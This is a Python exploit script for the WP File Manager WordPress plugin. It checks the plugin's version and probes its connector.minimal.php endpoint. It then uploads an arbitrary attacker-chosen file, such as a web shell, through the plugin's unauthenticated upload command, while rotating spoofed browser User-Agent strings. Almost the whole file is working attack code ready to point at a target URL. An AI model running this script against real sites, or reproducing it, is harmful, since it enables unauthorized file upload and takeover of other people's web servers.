1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131

import argparse
import requests
import re
import sys
import os
import json
import random

user_agents = [
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/92.0.902.55',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/92.0.902.55',
    'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/92.0.902.55'
]

def create_parser():
	parser = argparse.ArgumentParser(description='Exploit WP File Manager plugin')
	parser.add_argument('url', metavar='url', type=str, help='WordPress target URL')
	parser.add_argument('--upload-file', dest='upload_file', type=str, default=None, help='File to upload')
	parser.add_argument('--check', dest='check', action='store_true',
						help='Check if WP File Manager plugin is vulnerable')
	parser.add_argument('--verbose', dest='verbose', action='store_true', help='Enable verbose output')
	return parser


def check_wp_file_manager_version(url):
	target_endpoint = f"{url}/wp-content/plugins/wp-file-manager/readme.txt"
	user_agent = random.choice(user_agents)
	is_vulnerable = True

	try:
		response = requests.get(target_endpoint, headers={'User-Agent': user_agent}, timeout=5)
		version = re.search(r'== Changelog ==.*?([0-9]\.[0-9])', response.text, re.DOTALL)
		if version:
			version = version.group(1)
			print(f"[+] Found wp-file-manager version: {version}")
			patched_version = "6.9"
			smaller_version = min(version, patched_version)
			if version != patched_version and smaller_version == version:
				print("[+] Version appears to be vulnerable")
			else:
				print("[-] Version doesn't appear to be vulnerable")
				is_vulnerable = False
		else:
			print("[-] Unable to detect version. May be wp-file-manager plugin not installed.")
			is_vulnerable = False

		if not is_vulnerable:
			choice = input("Do you still want to continue (y/N): ")
			if choice.lower() not in ('y', 'yes'):
				print("Exiting...")
				sys.exit()
	except requests.exceptions.RequestException as e:
		print(f"[-] Error occurred while checking {url}: {e}")
		sys.exit()


def check_wp_file_manager(url):
	check_wp_file_manager_version(url)

	target_endpoint = f"{url}/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
	user_agent = random.choice(user_agents)

	try:
		response = requests.get(target_endpoint, headers={'User-Agent': user_agent}, timeout=5)
		is_vulnerable = re.search(r'\{\"error\":\["errUnknownCmd"\]\}', response.text)
		if is_vulnerable:
			print(f"[+] Target: {url} is vulnerable")
		else:
			print(f"[-] Target: {url} is not vulnerable")
	except requests.exceptions.RequestException as e:
		print(f"[-] Error occurred while checking {url}: {e}")


def exploit_wp_file_manager(url, file_upload, verbose):
	target_endpoint = f"{url}/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
	user_agent = random.choice(user_agents)
	try:
		response = requests.post(target_endpoint, headers={'User-Agent': user_agent}, timeout=5, data={
			'reqid': '17457a1fe6959',
			'cmd': 'upload',
			'target': 'l1_Lw',
			'mtime[]': '1576045135',
		}, files={
			'upload[]': open(file_upload, 'rb')
		})

		if verbose:
			print("Request method:", response.request.method)
			print("Request URL:", response.request.url)
			print("Request headers:", response.request.headers)
			print("="*50)
			print("Response status code:", response.status_code)

		file_upload_url = response.json().get('added', [{}])[0].get('url')
		if file_upload_url:
			print(f"[+] File uploaded successfully.\nLocation: {file_upload_url}")
		else:
			print("[-] File upload failed.")
	except requests.exceptions.RequestException as e:
		print(f"[-] Error occurred while exploiting {url}: {e}")
		return


if __name__ == "__main__":
	parser = create_parser()
	args = parser.parse_args()
	wp_url = args.url
	upload_file = args.upload_file
	verbose = args.verbose
	check = args.check

	if check:
		check_wp_file_manager(wp_url)
		sys.exit()
	elif upload_file is None:
		print("[-] No file specified.")
		sys.exit()
	elif not isinstance(upload_file, str):
		print("[-] Invalid file name.")
		sys.exit()
	elif not os.path.isfile(upload_file):
		print("[-] File not found.")
		sys.exit()

	exploit_wp_file_manager(wp_url, upload_file, verbose)